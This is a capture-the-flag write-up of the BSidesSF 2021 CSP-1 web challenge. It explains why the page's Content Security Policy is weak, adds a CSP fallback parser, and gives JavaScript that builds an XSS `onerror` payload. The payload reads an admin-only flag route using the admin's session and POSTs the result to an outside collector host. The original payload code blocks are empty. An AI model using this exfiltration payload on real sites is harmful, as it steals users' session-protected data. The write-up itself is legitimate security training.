Check out [https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#csp-1](https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#csp-1) for the writeup with images.
---
If we look at the Content Security Policy (CSP) for this page, we can see it's
very open. To identify this, you can learn what each directive does or use a tool such as [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com/).
The CSP in this case was:
```
default-src 'self' 'unsafe-inline' 'unsafe-eval'; script-src-elem 'self'; connect-src *
```
The `'unsafe-inline'` keyword in `default-src` allows execution of arbitrary inline scripts. One subtlety worth knowing: `script-src-elem 'self'` is set, and that directive governs `<script>` elements, so a browser that implements CSP3 blocks inline `<script>` blocks on this page. Inline event handlers are governed by `script-src-attr` instead, which is absent and therefore falls back to `script-src` and then to `default-src`, where `'unsafe-inline'` applies. `connect-src *` also lets `fetch()` reach any origin, which is what makes getting data out easy.
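To make the fallback rules concrete, here is an added example (my own code, not part of the original writeup) that parses the challenge's policy and resolves which directive governs each script context. It only models the keywords that matter here and simplifies host-source matching to the `*` and scheme-source cases.

```javascript
// Added example, not from the original writeup: a minimal CSP parser that
// resolves the CSP3 fallback chain so you can see which directive actually
// governs a given context for this challenge's policy.

const CHALLENGE_CSP =
  "default-src 'self' 'unsafe-inline' 'unsafe-eval'; script-src-elem 'self'; connect-src *";

// Fallback order per CSP3: if a directive is absent, the next one in the
// list is consulted. default-src is the last resort for fetch directives.
const FALLBACK = {
  "script-src-elem": ["script-src-elem", "script-src", "default-src"],
  "script-src-attr": ["script-src-attr", "script-src", "default-src"],
  "connect-src": ["connect-src", "default-src"],
  "img-src": ["img-src", "default-src"],
};

// Split a policy header into { directiveName: [sourceExpressions...] }.
function parseCsp(header) {
  const policy = {};
  for (const raw of header.split(";")) {
    const tokens = raw.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...values] = tokens;
    policy[name.toLowerCase()] = values;
  }
  return policy;
}

// Returns { directive, values } for the directive that governs `context`.
function governing(policy, context) {
  for (const name of FALLBACK[context]) {
    if (name in policy) return { directive: name, values: policy[name] };
  }
  return { directive: null, values: [] }; // nothing set: browser allows all
}

// Does the policy permit inline script in this context?
function allowsInline(policy, context) {
  const { directive, values } = governing(policy, context);
  if (directive === null) return true;
  // 'unsafe-inline' is ignored once a nonce or hash source is present.
  const hasNonceOrHash = values.some((v) => /^'(nonce-|sha(256|384|512)-)/.test(v));
  return values.includes("'unsafe-inline'") && !hasNonceOrHash;
}

// Does the policy let this context talk to an arbitrary external origin?
// Simplified: only '*' and scheme sources count, host lists are not matched.
function allowsExternal(policy, context) {
  const { directive, values } = governing(policy, context);
  if (directive === null) return true;
  return values.includes("*") || values.some((v) => /^https?:$/.test(v));
}
```

Running it over the challenge policy shows the asymmetry: inline `<script>` elements resolve to `script-src-elem 'self'` and are refused, inline event handlers resolve to `default-src` and are allowed, and `connect-src *` lets a `fetch()` go anywhere while an `<img>` beacon would be held to `'self'`.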
Let's start with a simple XSS payload:
```html
```
This already works! So now we only need our injected script, running in the admin's browser once the admin visits our payload, to read the
`/csp-one-flag` route (which only the admin's session can see) and send the contents back to us. We can use [fetch](https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API) for both steps, since `connect-src *` allows it to reach any origin.
We'll also use [https://requestbin.io/](https://requestbin.io/) again as the collector.
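The fetch-and-forward step, as an added example (my code, not the payload from the original writeup). The collector URL is a placeholder for your own RequestBin endpoint, and the choice of an event-handler attribute as the carrier is an assumption based on the `script-src-elem` versus `script-src-attr` split described above; `exfiltrate` takes the fetch implementation as a parameter so it can be exercised offline.

```javascript
// Added example, not the original writeup's payload: the fetch-and-forward
// step as a small function with fetch injected so it can run offline.

const FLAG_PATH = "/csp-one-flag";                      // route named in the writeup
const COLLECTOR = "https://requestbin.example/collect"; // assumption: your RequestBin URL

// Read the flag route in the victim's (admin's) session and POST the body to
// the collector. The flag request is same-origin so the admin's cookies go
// with it; connect-src * permits the cross-origin fetch() to the collector.
async function exfiltrate(fetchImpl, flagPath = FLAG_PATH, collector = COLLECTOR) {
  const res = await fetchImpl(flagPath, { credentials: "include" });
  const body = await res.text();
  await fetchImpl(collector, {
    method: "POST",
    mode: "no-cors", // we never need to read the collector's reply
    body: body,
  });
  return body;
}

// Wrap the same logic as an inline event handler rather than a <script>
// element: <script> elements are governed by script-src-elem 'self', while a
// handler attribute is governed by script-src-attr, which falls back to
// default-src and its 'unsafe-inline'. (Assumption about which sink the
// admin's browser enforces; the original payload is not reproduced here.)
function buildPayload(flagPath = FLAG_PATH, collector = COLLECTOR) {
  const js =
    `fetch(${JSON.stringify(flagPath)},{credentials:'include'})` +
    `.then(r=>r.text())` +
    `.then(t=>fetch(${JSON.stringify(collector)},{method:'POST',mode:'no-cors',body:t}))`;
  // HTML-escape the attribute value so the double quotes inside the JS survive parsing.
  const escaped = js.replace(/&/g, "&amp;").replace(/"/g, "&quot;");
  return `<img src=x onerror="${escaped}">`;
}
```

`buildPayload()` returns the HTML you would submit to the admin; in a browser, `exfiltrate(window.fetch)` is the same logic the handler runs. Using `mode: "no-cors"` keeps the collector POST a simple request, so no CORS preflight is needed for the data to leave.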
Here's the final payload submitted to the admin:
```html
```
And we get a flag back on the RequestBin side:
```
CTF{Can_Send_Payloads}
```